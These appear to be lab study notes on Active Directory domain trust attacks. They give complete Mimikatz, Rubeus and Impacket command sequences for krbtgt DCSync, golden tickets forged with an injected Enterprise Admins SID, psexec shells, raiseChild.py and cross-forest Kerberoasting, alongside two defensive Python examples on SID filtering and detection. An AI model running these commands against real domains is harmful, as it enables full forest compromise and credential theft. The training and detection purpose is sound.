Domain Trust Enumeration
Enumerate Domain Trusts (PowerView)
Show Existing Trusts
Get-DomainTrust
Show Trust Mapping
Get-DomainTrustMapping
Show Users in the Child Domain
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
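The enumeration above returns each trust's trustAttributes bitmask, and that bitmask is what decides whether SID history injected into a ticket (the child -> parent and cross-forest cases further down) is honoured or filtered by the trusting side. The following decoder is an added example, not part of the original notes and not PowerView or Impacket code; the flag values are taken from MS-ADTS, the flag names match the ones PowerView prints, the filtering summary is my own reading of those flags, and the sample trust records are constructed (the domain names are the ones used in these notes, the attribute values are invented for illustration).

```python
"""Decode an Active Directory trustAttributes value and summarise SID filtering.

Added example for these notes; not PowerView/Impacket code. Flag values are
the MS-ADTS TRUST_ATTRIBUTE_* constants; sample trust rows are constructed.
"""

TRUST_ATTRIBUTES = {
    0x00000001: "NON_TRANSITIVE",
    0x00000002: "UPLEVEL_ONLY",
    0x00000004: "QUARANTINED_DOMAIN",   # external trust with SID filtering quarantine
    0x00000008: "FOREST_TRANSITIVE",    # forest trust
    0x00000010: "CROSS_ORGANIZATION",
    0x00000020: "WITHIN_FOREST",        # parent/child or tree-root trust
    0x00000040: "TREAT_AS_EXTERNAL",    # forest trust with relaxed SID filtering
    0x00000080: "USES_RC4_ENCRYPTION",
}


def decode_trust_attributes(value: int) -> list:
    """Return the flag names set in a trustAttributes value, lowest bit first."""
    names = [name for bit, name in sorted(TRUST_ATTRIBUTES.items()) if value & bit]
    unknown = value & ~sum(TRUST_ATTRIBUTES)  # bits not in the table above
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:08x}")
    return names


def sid_filtering_state(value: int) -> str:
    """Summarise (my reading of the flags) how SIDs from the trusted side are filtered.

    - WITHIN_FOREST: no SID filtering at all, so extra SIDs in a PAC (the
      child -> parent golden ticket case) are accepted by the parent.
    - FOREST_TRANSITIVE without TREAT_AS_EXTERNAL: forest-aware filtering,
      the default for forest trusts; only SIDs of the trusted forest's own
      domains pass.
    - FOREST_TRANSITIVE with TREAT_AS_EXTERNAL: filtering relaxed, the trust
      is treated like an external one (SID history with RID >= 1000 passes).
    - QUARANTINED_DOMAIN: external trust, only SIDs of the trusted domain pass.
    - anything else: external/realm trust without quarantine.
    """
    if value & 0x20:
        return "none (intra-forest)"
    if value & 0x08:
        return "relaxed (TREAT_AS_EXTERNAL)" if value & 0x40 else "forest-aware"
    if value & 0x04:
        return "quarantined"
    return "not enforced"


# Constructed sample rows: (trust partner, trustAttributes). Values are
# illustrative, not taken from a real environment.
SAMPLE_TRUSTS = [
    ("LOGISTICS.INLANEFREIGHT.LOCAL", 0x20),   # child domain of the current forest
    ("FREIGHTLOGISTICS.LOCAL", 0x08),          # forest trust, default filtering
    ("PARTNER.EXAMPLE", 0x04),                 # external trust, quarantined
]


def report(trusts) -> list:
    """Return one (partner, flag names, filtering summary) tuple per trust."""
    return [(name, decode_trust_attributes(attrs), sid_filtering_state(attrs))
            for name, attrs in trusts]


if __name__ == "__main__":
    for row in report(SAMPLE_TRUSTS):
        print(*row, sep="  |  ")
```

Feed it the raw trustAttributes integers from your own enumeration instead of SAMPLE_TRUSTS; any trust reported as "none (intra-forest)" is one where SID history cannot be filtered by design, and "relaxed" or "not enforced" on a forest or external trust is a configuration worth reviewing.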
Attacking Domain Trusts - Child -> Parent (Windows)
To perform this attack after compromising a child domain, we need the following:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain.
With this data collected, the attack can be performed with Mimikatz.
1 Obtaining KRBTGT NT Hash
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
2 Obtaining SID Child Domain
Get-DomainSID
3 Name Target User
# Can be a fake username
4 FQDN Child Domain
Get-DomainTrust
5 SID Enterprise Admins Group
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
6 Putting It All Together
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus Way
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
7 Confirm Ticket
# List Tickets
klist
8 DCSync (now against the parent domain)
# Mimikatz
lsadump::dcsync /user:INLANEFREIGHT\<target-account>
Attacking Domain Trusts - Child -> Parent (Linux)
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
The KRBTGT hash for the child domain
The SID for the child domain
The name of a target user in the child domain (does not need to exist!)
The FQDN of the child domain
The SID of the Enterprise Admins group of the root domain
1 Get KRBTGT NT Hash
secretsdump.py logistics.inlanefreight.local/<user>@<target-ip> -just-dc-user LOGISTICS/krbtgt
2 Get SID Child Domain
lookupsid.py logistics.inlanefreight.local/<user>@<target-ip> | grep "Domain SID"
3 Name Target User
Can be any name
4 Get SID Enterprise Admins
lookupsid.py logistics.inlanefreight.local/<user>@<target-ip> | grep -B12 "Enterprise Admins"
5 Putting it all Together
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
6 Export ccache
export KRB5CCNAME=hacker.ccache
7 Get Shell
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@<dc-fqdn> -k -no-pass -target-ip 172.16.5.5
Automated Way (raiseChild.py)
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
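Both the Windows and the Linux walkthroughs above end with a child-domain ticket whose PAC carries the root domain's Enterprise Admins SID. The artifact that leaves on the parent side is a logon by a child-domain account whose group list contains a privileged SID issued by a different domain, and that is something a defender can check for. The following is an added example, not part of the original notes and not Mimikatz, Rubeus or Impacket code: the event records are constructed and only loosely modelled on the "Group Membership" list that Windows event 4627 carries (real events would need parsing first), and the two domain SIDs are the ones from the notes above (the Enterprise Admins SID with its RID 519 removed is the root domain SID).

```python
"""Flag logons whose group list carries a privileged SID from another domain.

Added example for these notes; not Mimikatz/Rubeus/Impacket code. Event
records are constructed; the domain SIDs are the two used in the notes.
"""
import re

# Domain-scoped SID: S-1-5-21-<a>-<b>-<c>, optionally followed by a RID.
SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+(?:-(\d+))?$")

# Constructed lookup; an analyst would fill this from trust enumeration.
DOMAIN_SIDS = {
    "S-1-5-21-2806153819-209893948-922872689": "LOGISTICS.INLANEFREIGHT.LOCAL",
    "S-1-5-21-3842939050-3880317879-2865463114": "INLANEFREIGHT.LOCAL",
}

# Well-known RIDs; their presence from a *foreign* domain is the signal.
PRIVILEGED_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_sid(sid: str):
    """Split a SID into (domain_sid, rid); a bare domain SID yields rid None."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain-scoped SID: {sid}")
    if m.group(1) is None:
        return sid, None
    return sid.rsplit("-", 1)[0], int(m.group(1))


def flag_cross_domain_privilege(event: dict) -> list:
    """Return (sid, group, issuing_domain) for every privileged SID in the
    logon's group list that was issued by a domain other than the account's
    own. An issuer not in DOMAIN_SIDS is reported as 'unknown domain' and
    still flagged, since a privileged RID from an unknown SID is suspicious."""
    hits = []
    for sid in event["group_sids"]:
        try:
            domain_sid, rid = split_sid(sid)
        except ValueError:
            continue  # built-in SIDs such as S-1-5-32-545 are not domain-scoped
        issuer = DOMAIN_SIDS.get(domain_sid, "unknown domain")
        if rid in PRIVILEGED_RIDS and issuer != event["account_domain"]:
            hits.append((sid, PRIVILEGED_RIDS[rid], issuer))
    return hits


def scan(events) -> dict:
    """Map account name -> findings, keeping only logons that have findings."""
    result = {}
    for event in events:
        hits = flag_cross_domain_privilege(event)
        if hits:
            result[event["account_name"]] = hits
    return result


# Constructed sample: the first record mirrors the ticket built above (a
# child-domain user whose groups include the root domain's Enterprise Admins);
# the second is an ordinary child-domain logon.
SAMPLE_EVENTS = [
    {"event_id": 4627, "account_name": "hacker",
     "account_domain": "LOGISTICS.INLANEFREIGHT.LOCAL",
     "group_sids": ["S-1-5-21-2806153819-209893948-922872689-513",
                    "S-1-5-21-3842939050-3880317879-2865463114-519"]},
    {"event_id": 4627, "account_name": "htb-student",
     "account_domain": "LOGISTICS.INLANEFREIGHT.LOCAL",
     "group_sids": ["S-1-5-21-2806153819-209893948-922872689-513",
                    "S-1-5-32-545"]},
]


if __name__ == "__main__":
    for account, hits in scan(SAMPLE_EVENTS).items():
        for sid, group, issuer in hits:
            print(f"{account}: holds {group} ({sid}) issued by {issuer}")
```

The same check, run over real group-membership data from the parent domain's controllers, also covers legitimate cross-domain membership, so expect to whitelist known administrative accounts; the point is that a child-domain principal holding RID 519 of the root domain is never something a child domain can grant on its own.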
Attacking Domain Trusts - Cross-Forest (Windows)
Cross-Forest Kerberoasting
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
Admin Password Reuse & Group Membership
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName <SID>
# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
SID History Abuse
Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)
Cross-Forest Kerberoasting
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley